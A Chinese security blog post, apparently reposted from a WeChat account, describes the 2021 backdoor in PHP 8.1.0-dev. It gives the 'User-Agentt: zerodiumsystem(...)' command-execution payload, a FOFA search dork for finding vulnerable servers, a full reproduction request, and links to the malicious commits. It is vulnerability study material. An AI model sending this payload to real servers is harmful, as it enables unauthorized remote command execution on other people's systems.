【后门】PHP 8.1.0-dev 命令执行漏洞

admin 2023年12月19日09:40:25评论94 views字数 811阅读2分42秒阅读模式
免责声明本文所涉及的技术和方法仅供合法合规的目的参考和学习使用。严禁利用本文内容从事任何违法或未经授权的活动。如因个人非法使用所造成的任何不良后果,作者及本公众号概不负责

今天,继续讲一个鲜为人知但有价值的漏洞。

01

漏洞概述

01

【后门】PHP 8.1.0-dev 命令执行漏洞

HTTP Header User-Agentt 字段存在命令执行后门

payload:

User-Agentt: zerodiumsystem('id');
【后门】PHP 8.1.0-dev 命令执行漏洞

02

FOFA Dork

02

【后门】PHP 8.1.0-dev 命令执行漏洞

FOFA Dork: "PHP/8.1.0-dev"

【后门】PHP 8.1.0-dev 命令执行漏洞

【后门】PHP 8.1.0-dev 命令执行漏洞

03

漏洞复现

03

【后门】PHP 8.1.0-dev 命令执行漏洞
GET / HTTP/1.1
User-Agentt: zerodiumsystem('echo 666pHp');
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

【后门】PHP 8.1.0-dev 命令执行漏洞

【后门】PHP 8.1.0-dev 命令执行漏洞

04

漏洞资料

04

【后门】PHP 8.1.0-dev 命令执行漏洞

PHP 8.1.0-dev版本于2021年3月28日发布时曾被发现存在后门问题。在php-src存储库中提交了两个恶意的代码更改,但随后被及时发现并成功清除。这一事件突显了对于软件安全的持续关注和及时响应的重要性。对于软件安全问题,我们建议及时关注官方通告,确保及时应用安全补丁,以维护系统和应用的稳健性

两个恶意提交Commit记录如下:

https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d

https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a

原文始发于微信公众号(一个不正经的黑客):【后门】PHP 8.1.0-dev 命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月19日09:40:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【后门】PHP 8.1.0-dev 命令执行漏洞https://cn-sec.com/archives/2240107.html

发表评论

匿名网友 填写信息